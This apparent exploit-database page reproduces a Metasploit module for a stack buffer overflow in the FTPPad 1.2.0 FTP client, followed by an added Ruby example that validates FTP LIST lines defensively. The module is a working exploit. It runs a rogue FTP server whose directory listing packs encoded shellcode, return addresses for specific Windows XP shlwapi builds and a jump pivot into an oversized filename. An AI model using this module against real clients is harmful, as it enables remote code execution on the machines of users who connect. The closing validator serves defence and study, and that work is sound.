FTPPad 1.2.0 Stack Buffer Overflow

Reported by corelanc0d3r on 12 Oct 2010 17:31:18. Type: metasploit. Source: www.rapid7.com

This module exploits a stack buffer overflow in the FTPPad 1.2.0 FTP client. The overflow is triggered when the client connects to an FTP server that sends an overly long directory and filename in response to a LIST command.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Exploit::Remote::FtpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'FTPPad 1.2.0 Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow FTPPad 1.2.0 ftp client. The overflow is
        triggered when the client connects to a FTP server which sends an overly long directory
        and filename in response to a LIST command.

        This will cause an access violation, and will eventually overwrite the saved extended
        instruction pointer.  Payload can be found at EDX+5c and ESI+5c, so a little pivot/
        sniper was needed to make this one work.
      },
      'Author'         =>
        [
          'corelanc0d3r'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '68714' ],
          [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 3000,
          'BadChars' => "\x00\x0a\x2f\x5c\xff\x0c\x0d\x08\x09",
          'DisableNops' => true,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          #shlwapi sniper + pivot :  MOV DWORD PTR DS:[EDX],EAX + CALL ESI
          [ 'XP SP3 Professional, English - shlwapi 6.00.2900.5912', { 'Ret' => 0x77FA6556 } ],
          [ 'XP SP3 Professional, German - shlwapi 6.00.2900.5912' , { 'Ret' => 0x77f86556 } ],
          [ 'XP SP3 Professional, English - shlwapi 6.00.2900.5512', { 'Ret' => 0x77FA6526 } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2010-10-12',
      'DefaultTarget'  => 0))

  end

  def setup
    super
  end

  def on_client_unknown_command(c,cmd,arg)
    c.put("200 OK\r\n")
  end

  def on_client_command_list(c,arg)
    conn = establish_data_connection(c)
    if(not conn)
      c.put("425 Can't build data connection\r\n")
      return
    end
    print_status(" - Data connection set up")
    code = 150
    c.put("#{code} Here comes the directory listing.\r\n")
    code = 226
    c.put("#{code} Directory send ok.\r\n")
    totalsize = 13000
    foldername = "A" * 24 + payload.encoded + ("A" * (3318-payload.encoded.length))
    #EDX+5c and ESI+5c point at shellcode
    #we control EAX and EIP
    #use value in EAX to write to EDX (to make a jump forward, about 5c bytes)
    #and then jump to ESI (which will then execute the jump forward, to payload)
    foldername << [target.ret].pack('V')  # MOV DWORD PTR DS:[EDX],EAX # ... # CALL ESI
    foldername << "\x41\x41\x75\x5B"  # EAX -> 75 5B = JNZ SHORT -> shellcode
    foldername << " " * (totalsize - foldername.length)
    print_status(" - Sending directory list via data connection")
    dirlist = "drwxrwxrwx    1 100      0         11111 Jun 11 21:10 #{foldername}\r\n"
    conn.put(dirlist + dirlist + dirlist + dirlist)
    conn.close
    return
  end
end
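The module's `on_client_command_list` sends ls(1)-style listing lines whose filename field is thousands of bytes long, which is what the client fails to bound before copying. The following is an added defensive example, not part of the Metasploit module or of FTPPad: it parses UNIX-style LIST lines into fields and classifies each entry as acceptable, malformed, oversized, or containing non-printable bytes, the checks a hardened client (or a monitor watching FTP data channels) would apply before trusting the name. The 255-byte limit, the regular expression, and the sample listing are constructed assumptions for illustration.

```ruby
# Added example (not from the module above or from FTPPad): validate
# ls(1)-style FTP LIST responses before a client copies the filename
# into a fixed-size buffer.

# Upper bound on an accepted filename. 255 is an assumption chosen to
# match common NAME_MAX values; it is not a limit taken from FTPPad.
MAX_NAME_LEN = 255

# Fields of a UNIX-style listing line: perms, links, owner, group, size,
# modification time, then everything that remains is the name.
LIST_LINE = /\A([\-dlbcps][rwxstST\-]{9})\s+(\d+)\s+(\S+)\s+(\S+)\s+(\d+)\s+(\w{3}\s+\d{1,2}\s+[\d:]{4,5})\s+(.*)\z/

# Parse one listing line into a Hash, or nil if it does not match the
# expected layout.
def parse_list_line(line)
  m = LIST_LINE.match(line.chomp)
  return nil unless m
  { perms: m[1], links: m[2].to_i, owner: m[3], group: m[4],
    size: m[5].to_i, mtime: m[6], name: m[7] }
end

# Classify a listing line as :ok, :malformed, :oversized or :nonprintable.
# Byte-level checks are used so that binary or mis-encoded input cannot
# raise encoding errors and slip past the test.
def check_list_line(line, max_len = MAX_NAME_LEN)
  entry = parse_list_line(line)
  return :malformed unless entry
  name = entry[:name]
  return :oversized if name.bytesize > max_len
  return :nonprintable if name.bytes.any? { |b| b < 0x20 || b == 0x7f }
  :ok
end

# Audit a whole CRLF-separated listing and count each verdict.
def audit_listing(data)
  findings = Hash.new(0)
  data.split("\r\n").each { |l| findings[check_list_line(l)] += 1 }
  findings
end

# Constructed sample listing: one ordinary entry and one entry with a
# 13000-byte name, the size the module above pads its listing to.
SAMPLE_LISTING =
  "drwxr-xr-x    2 100      0          4096 Jun 11 21:10 docs\r\n" +
  "drwxrwxrwx    1 100      0         11111 Jun 11 21:10 " + ("A" * 13000) + "\r\n"

if __FILE__ == $0
  audit_listing(SAMPLE_LISTING).each { |verdict, count| puts "#{verdict}: #{count}" }
end
```

A client that rejects `:oversized` and `:nonprintable` entries before any copy never reaches the overflow; a network monitor applying the same classification to FTP data-channel traffic gets a simple, low-noise signal for servers that return abnormally long directory entries.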
